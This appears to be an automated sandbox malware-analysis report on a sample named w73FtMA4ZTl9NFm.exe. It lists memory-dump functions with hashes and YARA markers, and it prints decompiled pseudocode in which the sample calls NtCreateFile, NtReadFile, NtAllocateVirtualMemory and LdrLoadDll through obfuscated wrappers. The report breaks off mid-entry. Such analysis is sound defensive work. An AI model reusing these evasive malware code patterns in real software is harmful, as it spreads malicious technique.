Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.245210834.000000000158D000.00000040.00000001.sdmp, Offset: 0158D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba364930c8ae35e306848343048d4dfa6b2bb1d868f028fe0941ce339f551b85
Instruction ID: 2b2a173c1c5c38bdd1f653d35ce34a426635e0f6d7d1b21d9d033352439782e9
Opcode Fuzzy Hash: ba364930c8ae35e306848343048d4dfa6b2bb1d868f028fe0941ce339f551b85
Instruction Fuzzy Hash: B2216D75509380CFDB02CF64D590715BFB1AB46214F28C5DAD8498F697C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0157D4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.245125330.000000000157D000.00000040.00000001.sdmp, Offset: 0157D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0ce4394a271259760c2c660e1cb6f29709190ae4859f5a8d1e8115099c26a4
Instruction ID: 7585a458eccc8334f9fd32d6e291100595bfebbbafa5c156a6add00790bc59c3
Opcode Fuzzy Hash: 4e0ce4394a271259760c2c660e1cb6f29709190ae4859f5a8d1e8115099c26a4
Instruction Fuzzy Hash: 6E11B176504280CFCB16CF54D5C4B1ABF71FF84324F2486A9D8054F656C33AD456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0157D749, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.245125330.000000000157D000.00000040.00000001.sdmp, Offset: 0157D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e0b9fe87c1bc9a0ea576581266f124fcd4e15e75876c7dd41e7dd5f96924177
Instruction ID: 4cc3621f5ef320093ef1dc209f13006ba0ecbfeba4953eb997e16e2464e54e0a
Opcode Fuzzy Hash: 3e0b9fe87c1bc9a0ea576581266f124fcd4e15e75876c7dd41e7dd5f96924177
Instruction Fuzzy Hash: B801A7715083C49AE7204A5AED8576AFFE8FF85274F08C55AEE045E287C379A844C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0157D748, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.245125330.000000000157D000.00000040.00000001.sdmp, Offset: 0157D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aec12fd826fa43dae0ca922d76ef4231eee0f5326e3907139e282f8a8f25b3b
Instruction ID: 7fd8d8ec0b32440c64027340cad642c70ec3e0146a2843bd43364ab26d91072c
Opcode Fuzzy Hash: 9aec12fd826fa43dae0ca922d76ef4231eee0f5326e3907139e282f8a8f25b3b
Instruction Fuzzy Hash: 0BF096714083849EEB258E1ADCC4B66FFA8FF81634F18C45AED085F287C3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0C143208, Relevance: 3.8, Strings: 3, Instructions: 75COMMON

Download Yara Rule

Strings

A<Bt, xrefs: 0C143383
A<Bt, xrefs: 0C1433AD
A<Bt, xrefs: 0C14338D

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID: A<Bt$A<Bt$A<Bt
API String ID: 0-3016284187
Opcode ID: 6066311422cb206cbefebb9118dce0db3049e61ef812b51281daba1a634dc886
Instruction ID: 0b548c5f440a1525e8814084c696134cd76d7fa67c170aa15fbbd4a39295400d
Opcode Fuzzy Hash: 6066311422cb206cbefebb9118dce0db3049e61ef812b51281daba1a634dc886
Instruction Fuzzy Hash: 72216BB1E01229DBDF18CF6AD8406AEFBF3BFC8200F10C06AD918A7255DB345A418F51

Uniqueness

Uniqueness Score: -1.00%

Function 0C143205, Relevance: 3.8, Strings: 3, Instructions: 63COMMON

Download Yara Rule

Strings

A<Bt, xrefs: 0C143383
A<Bt, xrefs: 0C1433AD
A<Bt, xrefs: 0C14338D

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID: A<Bt$A<Bt$A<Bt
API String ID: 0-3016284187
Opcode ID: 4aac0724143a6f20f15ae0ea55a1b7631deb2b56dff829ade83ad64bef17a04b
Instruction ID: 9530ffba7b5d88ef953865d89f15496e401d57797d340bf1b775cd2c9462f5db
Opcode Fuzzy Hash: 4aac0724143a6f20f15ae0ea55a1b7631deb2b56dff829ade83ad64bef17a04b
Instruction Fuzzy Hash: F2213DB0E116199BDB5CCF6AC9406AEFAF3BFC8200F14C06AD918A7354DB344A419F51

Uniqueness

Uniqueness Score: -1.00%

Function 033BA758, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 368e9f5997d2ade6c64c6ff5243099715010802c641b4d2b7134ad02f8f845be
Instruction ID: cae163067339c4bd6276bc46640a48f0fed12b180aac2e49c4d4f0e88d65348f
Opcode Fuzzy Hash: 368e9f5997d2ade6c64c6ff5243099715010802c641b4d2b7134ad02f8f845be
Instruction Fuzzy Hash: D5A17036E007198FCF15DFA5C8845DEFBB2FF85300B15816AE905AF620EB759946CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0C145EB8, Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7612f1106bd2516205616a2b1f725ab6d31b2ff02905dfcb1d99082cf33c7da
Instruction ID: 2f04569a98175a3b9b4bb9a80af09b33a81ebe9c31c61e9c0b31ff07aefdcb57
Opcode Fuzzy Hash: d7612f1106bd2516205616a2b1f725ab6d31b2ff02905dfcb1d99082cf33c7da
Instruction Fuzzy Hash: 7EA1E6B4E0520ADFCB48CFEAD5815AEFBF2EF89300F14942AD515BB214D7349A428F91

Uniqueness

Uniqueness Score: -1.00%

Function 0C145EB3, Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f3d7c89e367f03b1a3de16bc43a26ffe8e30ae017aa943b58284fa53422cf0
Instruction ID: 126752927cbe9bf4ec0a47e5bf859d562e8a1d34d071f9ee18356389595b0b82
Opcode Fuzzy Hash: c0f3d7c89e367f03b1a3de16bc43a26ffe8e30ae017aa943b58284fa53422cf0
Instruction Fuzzy Hash: EC91D6B4E0520ADFCB48CFEAD5815AEFBF2EF89300F14956AD415BB214D7345A428F91

Uniqueness

Uniqueness Score: -1.00%

Function 033BC3A0, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.246056357.00000000033B0000.00000040.00000001.sdmp, Offset: 033B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b29b5575ae25750ee0e16b2b95952ddb1efc3d16ef15c675263b124a21332a30
Instruction ID: cace9b4d44015bb2a82265be40c61842dbd2e2a14a846b2ce1d12c70170949ac
Opcode Fuzzy Hash: b29b5575ae25750ee0e16b2b95952ddb1efc3d16ef15c675263b124a21332a30
Instruction Fuzzy Hash: 67C16EB18117458BD320EF25E889989BB71FBA7329F524A08D5612F6F8E7B4104FEF44

Uniqueness

Uniqueness Score: -1.00%

Function 0C1462B0, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e123b762ab0b19a29b2e737e234755bfa6835c1983e292d86815c7fee6e2a530
Instruction ID: dd31a31aca6d48a58af05fa9cc0be3c06976b3b1ec6dda7b5570951d17f971bc
Opcode Fuzzy Hash: e123b762ab0b19a29b2e737e234755bfa6835c1983e292d86815c7fee6e2a530
Instruction Fuzzy Hash: 02615C71E0462ACBDB68CF66C8407AEBBB7ABC9300F15D5EAD40DA6244E7345A81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0C1462AD, Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1ea10eccb955ef6cc4d8b3e2f1d4c184bcffbf34e09338671d950ee7a5ee9fa
Instruction ID: 531a614f1de4ea9025696e55245ac551677c03fce59256d49b189167a8d5ae28
Opcode Fuzzy Hash: f1ea10eccb955ef6cc4d8b3e2f1d4c184bcffbf34e09338671d950ee7a5ee9fa
Instruction Fuzzy Hash: C8513C71E0466ACBDB68CF66C8407AEBBB2AFC9300F14D5EAD40DA6254E7305A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0C146503, Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99ffd23ca520489f50fc00fbc3cd39646d5426d154cd67e909aced68302854dd
Instruction ID: 8cbe75a89c4dd301773c079edef8e4ee8bbb3c1c25f2ce9817be8c63ae2a748c
Opcode Fuzzy Hash: 99ffd23ca520489f50fc00fbc3cd39646d5426d154cd67e909aced68302854dd
Instruction Fuzzy Hash: 85515B71D1462ACBDB28CF55C840BEDBBB2BB99300F1195EAD00EB6640E7309AC1CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0C141FB0, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6b49874321e73f5ebaf392d1ba38067e34260105983fcf978ca7dd29d6cdb8
Instruction ID: 31e0b22cef5642a317ae9939894a64f5235ce46bbc6d0b752eeba7f62276bbf4
Opcode Fuzzy Hash: ff6b49874321e73f5ebaf392d1ba38067e34260105983fcf978ca7dd29d6cdb8
Instruction Fuzzy Hash: 64316D70E11218CBDB1CCF6AD9406AEFBF7FBC8210F14C16AE508A7214D7314A818F60

Uniqueness

Uniqueness Score: -1.00%

Function 0C140F10, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daf249872ae90d8024e41e460a25ca2c435119e85fe395706bd85f436d8bc61e
Instruction ID: cb50f892edede50982ab0650407c906fa11a7d953c7213015f1ba0f63b6581e0
Opcode Fuzzy Hash: daf249872ae90d8024e41e460a25ca2c435119e85fe395706bd85f436d8bc61e
Instruction Fuzzy Hash: 07215C71E116199BDB08CFAAE981ADEFBF7BFC8210F14C17AD508B7254DB305A418B51

Uniqueness

Uniqueness Score: -1.00%

Function 0C1408D3, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df120bd46603d35d37d800da62e1f917f84d26ad13cc4f704003bc9adc747223
Instruction ID: 305769d8acfd26c7b55ec745ff1ec4750a631cbbd27bbd3a4e1b88dd2c5e514d
Opcode Fuzzy Hash: df120bd46603d35d37d800da62e1f917f84d26ad13cc4f704003bc9adc747223
Instruction Fuzzy Hash: 6E213B71E056489BDB49CF6AD9412AEBFF3AFCA310F18C0AAD448A7215DA304986CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0C140F09, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74f0703846d951dd0b859a0765efd731f326e9c6b201c055d692ff93aa93c638
Instruction ID: 09c73ea18be52a012a22527e5a3cef64c69a09ced7e6075b15ff4de83d44b72e
Opcode Fuzzy Hash: 74f0703846d951dd0b859a0765efd731f326e9c6b201c055d692ff93aa93c638
Instruction Fuzzy Hash: 07213970E116199BDB08CFABD981A9EFAF7AFC8310F14C17AE508AB254DB345A418F51

Uniqueness

Uniqueness Score: -1.00%

Function 0C141FAD, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179265928e634e1481b760d2121ef53f7e786a20a73ddc98e4f19f91dfb50265
Instruction ID: 180292070c75b110aebd2986d0c428eee442e0703d598cda75bdff5bdc13cd13
Opcode Fuzzy Hash: 179265928e634e1481b760d2121ef53f7e786a20a73ddc98e4f19f91dfb50265
Instruction Fuzzy Hash: 3A214FB0E12619DBDB5CCF66DA407AEFAF3BFC8200F14C16AD508A7254DB344A858F60

Uniqueness

Uniqueness Score: -1.00%

Function 0C143823, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e91fb8d1bb21a93e5874865da67c5d382fb124e1c168b1b1e30dce05ebf8ba8
Instruction ID: 9e3b3659048251d2c71d0b7de9fcc326edd76d8bb23e90726a0a4d8df88c206d
Opcode Fuzzy Hash: 8e91fb8d1bb21a93e5874865da67c5d382fb124e1c168b1b1e30dce05ebf8ba8
Instruction Fuzzy Hash: C921C070E156548FDB49CFAAD94029EFFF3AFC9310F24C17AD508A7265DB304A428B55

Uniqueness

Uniqueness Score: -1.00%

Function 0C140908, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c5112de6fa2b9058dd1e2c32b36960018a80e56ff70c2aefeff75a52c99d6e
Instruction ID: 1023174e3392bdccca12696b400bbf14b6271871f5c68ac0dfefde4d3329a0c8
Opcode Fuzzy Hash: e7c5112de6fa2b9058dd1e2c32b36960018a80e56ff70c2aefeff75a52c99d6e
Instruction Fuzzy Hash: 22110371E116199BDB48CFABD9406AEFBF7ABC8210F14C06AD508A7214DB305A518FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0C149381, Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e4856891065d1e8c716234fb44f53564ebf121e3f5070f221679b3243ff8458
Instruction ID: d86a37410cf56c5640bfa69deb7ff491102a6a430f9836dc82447b9499beeeb8
Opcode Fuzzy Hash: 7e4856891065d1e8c716234fb44f53564ebf121e3f5070f221679b3243ff8458
Instruction Fuzzy Hash: C2119A70E052588FCB14CFB4C918BEEBBF1BB4A311F19906AD445B7281C7398948CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0C149390, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.252414364.000000000C140000.00000040.00000001.sdmp, Offset: 0C140000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34570b8cc5ba4f50026b7aa3c4fa8a81657cbb807259ec0cbd89fb72a6d7e758
Instruction ID: ad7b2350bee774c2e1fcbc3500ef81ea311b682ab16e932a4c45bbe3f5b401f7
Opcode Fuzzy Hash: 34570b8cc5ba4f50026b7aa3c4fa8a81657cbb807259ec0cbd89fb72a6d7e758
Instruction Fuzzy Hash: A7113970E052588FDB18CFA5C518BEEBBF5BB4E310F189069D451B3290D7788944CB68

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: w73FtMA4ZTl9NFm.exe PID: 1168 Parent PID: 3764 w73FtMA4ZTl9NFm.exeCOMMON

Executed Functions

Function 00419DFA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00419DFA(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;

				asm("repe xor ah, [eax+0x550124c9]");
				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t28, _t31); // executed
				return _t18;
			}

0x00419dfa
0x00419e03
0x00419e0f
0x00419e17
0x00419e22
0x00419e3d
0x00419e45
0x00419e49

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: 750430b0ab49d2cce2ca61c8d9a3a9960ab25ebb2851b1047a7b72d01555c201
Instruction ID: 0b55ce71a6e6505e40ac0731a9ea5151751947c1bfd179085102d44ac43ca66f
Opcode Fuzzy Hash: 750430b0ab49d2cce2ca61c8d9a3a9960ab25ebb2851b1047a7b72d01555c201
Instruction Fuzzy Hash: F2F0F9B6200108AFCB04DF89CC91EEB77A9AF8C354F068649BE1D97251C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e03
0x00419e0f
0x00419e17
0x00419e22
0x00419e3d
0x00419e45
0x00419e49

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D4A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00419D4A(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				signed int _v117;
				long _t23;
				void* _t33;
				signed int _t40;

				asm("out 0xd3, eax");
				_v117 = _v117 | _t40;
				asm("fcom qword [ebp-0x75]");
				_t17 = _a4;
				_t5 = _t17 + 0xc40; // 0xc40
				E0041A950(_t33, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t13 =  &_a20; // 0x414b77
				_t23 = NtCreateFile(_a8, _a12, _a16,  *_t13, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}

0x00419d4a
0x00419d4c
0x00419d4f
0x00419d53
0x00419d5f
0x00419d67
0x00419d89
0x00419d9d
0x00419da1

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: bd73191c2f784f61f984977ae2120a7ed06740de33f4c876784d2f519bc08823
Instruction ID: 78cdb44aeffaf5cbb95adb37898c0c5df46663d6c7a8d6124377c82bc4e669a2
Opcode Fuzzy Hash: bd73191c2f784f61f984977ae2120a7ed06740de33f4c876784d2f519bc08823
Instruction Fuzzy Hash: 4101D2B2200108AFCB18CF98C891EEB77A9AF8C354F118209FA1DD3241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d5f
0x00419d67
0x00419d89
0x00419d9d
0x00419da1

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C640( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCE0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AE90(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acdc
0x0040acdf
0x0040ace4
0x0040ace9
0x0040acf3
0x0040acf8
0x0040acfb
0x0040acfd
0x0040ad05
0x0040ad0a
0x0040ad0a
0x0040ad11
0x0040ad19
0x0040ad1c
0x0040ad1e
0x0040ad32
0x00000000
0x0040ad34
0x0040ad3a
0x0040acee
0x0040acee
0x0040acee

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00419F2A, Relevance: 1.5, APIs: 1, Instructions: 34
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00419F2A(void* __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_push(__edi);
				asm("das");
				asm("into");
				asm("lock push ebp");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E0041A950(__edi, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f2b
0x00419f2d
0x00419f2e
0x00419f2f
0x00419f33
0x00419f3f
0x00419f47
0x00419f69
0x00419f6d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: d53282c0e9f74c0aaba6b7f49b508353c1cf042cb603871b6d80738f8d8c49e7
Instruction ID: ff2c14fc7d156e9bc952d196bb17cbdc2a2bb7bdb9399d57b7ae007505c112f0
Opcode Fuzzy Hash: d53282c0e9f74c0aaba6b7f49b508353c1cf042cb603871b6d80738f8d8c49e7
Instruction Fuzzy Hash: 73F0F8B1210208AFDB14DF89CC81EE777ADAF88654F118549BE1897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x00419f3f
0x00419f47
0x00419f69
0x00419f6d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

Source File: 00000003.00000002.287250589.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x00419e83
0x00419e86
0x00419e8f
0x00419e97
0x00419ea5
0x00419ea9

APIs

